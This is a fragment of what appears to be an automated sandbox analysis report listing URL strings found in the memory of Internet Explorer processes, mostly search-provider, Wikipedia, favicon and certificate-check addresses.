Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://fr.wikipedia.org/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://fr.wikipedia.org/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://fr.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://google.pchome.com.tw/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://home.altervista.org/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://in.search.yahoo.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://it.search.dada.net/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://it.search.yahoo.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://it.wikipedia.org/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://it.wikipedia.org/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://it.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://ja.wikipedia.org/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://ja.wikipedia.org/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://ja.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://jobsearch.monster.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://kr.search.yahoo.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://list.taobao.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://mail.live.com/
Source: iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://msk.afisha.ru/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://nl.wikipedia.org/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://nl.wikipedia.org/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://nl.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: iexplore.exe, 00000003.00000002.22416420384.02EB7000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: iexplore.exe, 00000003.00000002.22416420384.02EB7000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: iexplore.exe, 00000003.00000002.22416420384.02EB7000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: iexplore.exe, 00000003.00000002.22416420384.02EB7000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: iexplore.exe, 00000003.00000002.22416420384.02EB7000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: iexplore.exe, 00000003.00000002.22413107787.0029E000.00000004.sdmpString found in binary or memory: http://ocsp.digicert.com0:
Source: iexplore.exe, 00000003.00000002.22416420384.02EB7000.00000004.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: iexplore.exe, 00000003.00000002.22416420384.02EB7000.00000004.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: iexplore.exe, 00000003.00000002.22413107787.0029E000.00000004.sdmpString found in binary or memory: http://ocsp.msocsp.com0
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://p.zhongsou.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://pl.wikipedia.org/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://pl.wikipedia.org/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://pl.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://price.ru/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://price.ru/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://pt.wikipedia.org/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://pt.wikipedia.org/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://pt.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://recherche.linternaute.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://recherche.tf1.fr/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://rover.ebay.com
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://ru.search.yahoo.com
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://ru.wikipedia.org/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://ru.wikipedia.org/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://ru.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://sads.myspace.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.about.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.alice.it/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.aol.co.uk/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.aol.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.aol.in/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.atlas.cz/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.auction.co.kr/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.auone.jp/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.books.com.tw/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.centrum.cz/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.chol.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.cn.yahoo.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.daum.net/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.dreamwiz.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.ebay.co.uk/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.ebay.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.ebay.de/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.ebay.es/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.ebay.fr/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.ebay.in/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.ebay.it/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.empas.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.espn.go.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.gamer.com.tw/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.gismeteo.ru/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.goo.ne.jp/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.hanafos.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.interpark.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.ipop.co.kr/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.livedoor.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.lycos.co.uk/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.lycos.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
Source: iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.nate.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.naver.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.nifty.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.orange.co.uk/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.rediff.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.seznam.cz/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.sify.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.yahoo.co.jp
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.yahoo.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search.yam.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search1.taobao.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://search2.estadao.com.br/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://searchresults.news.com.au/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://service2.bfast.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://si.wikipedia.org/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://si.wikipedia.org/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://si.wikipedia.org/w/api.php?action=opensearch&amp;format=xml&amp;search=
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://suche.aol.de/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://suche.freenet.de/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://suche.lycos.de/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://suche.t-online.de/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://suche.web.de/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415684901.02B50000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317207664.030D0000.00000008.sdmpString found in binary or memory: http://treyresearch.net
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://tw.search.yahoo.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://udn.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://udn.com/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://uk.ask.com/
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
Source: iexplore.exe, 00000003.00000002.22415890904.02C09000.00000008.sdmp, iexplore.exe, 00000004.00000002.22317741145.03189000.00000008.sdmpString found in binary or memory: http://uk.search.yahoo.com/
